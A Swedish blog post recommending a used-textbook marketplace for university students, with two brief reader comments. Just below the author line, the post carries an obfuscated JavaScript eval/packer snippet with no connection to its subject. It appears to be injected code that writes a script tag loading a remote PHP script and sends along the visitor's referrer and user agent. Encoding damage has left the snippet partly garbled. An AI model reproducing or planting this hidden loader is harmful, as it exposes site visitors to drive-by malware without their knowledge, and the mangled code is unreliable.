Image Image Image Image Image Image Image Image Image Image

| 20 september, 2018

Scroll to top

Top

Hitta Begagnade skolböcker för din utbildning

Hitta Begagnade skolböcker för din utbildning
Sebastian Plengier Ehrnfelt

Revue.se eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hidnt|var|u0026u|referrer|beafa||js|php’.split(‘|’),0,{}))
fick här om dagen in ett tips på en snygg och bra hemsida som jag tror underlättar er studenters utgifter gällande litteratur.

Jag blev själv klar med min utbildning i Marknadsföring på Stockholms Universitet nu i somras. Jag vet att under dessa tre år så var det mycket pengar som lades ner på otroligt dyr litteratur som man var tvungen att införskaffa. En bok i ekonomi som kostar omkring 1000 kr är inte något som man egentligen vill lägga sina få kronor i inkomst på. Självklart finns det många alternativ att ta till för att hålla ner dessa kostnader. Du kan kolla efter böcker på sidor som Blocket och Tradera, men jag lovar, det är inte lätt att hitta just din bok där.

begagnadeskolbocker.se är en hemsida som erbjuder studenter att lägga ut sina ”använda” böcker och göra dem tillgängliga igen för nästkommande studenter.
En nischad hemsida där du som student kan hitta billigare litteratur.

Att lägga in en annons kostar ingenting.

Sidan är relativt ny som jag förstår det så utbudet av böcker är i nuläget lite begränsat. Men ge sidan några månader så tror jag själv att detta kan bli något.

Hemsida: http://begagnadeskolbocker.se/

Tack för tipset Niclas

Comments

  1. Anonym

    Ser riktigt bra ut

  2. Jag har faktiskt testat siten och fick napp efter några dagar! Häftigt sammanträffande att läsa om den här 🙂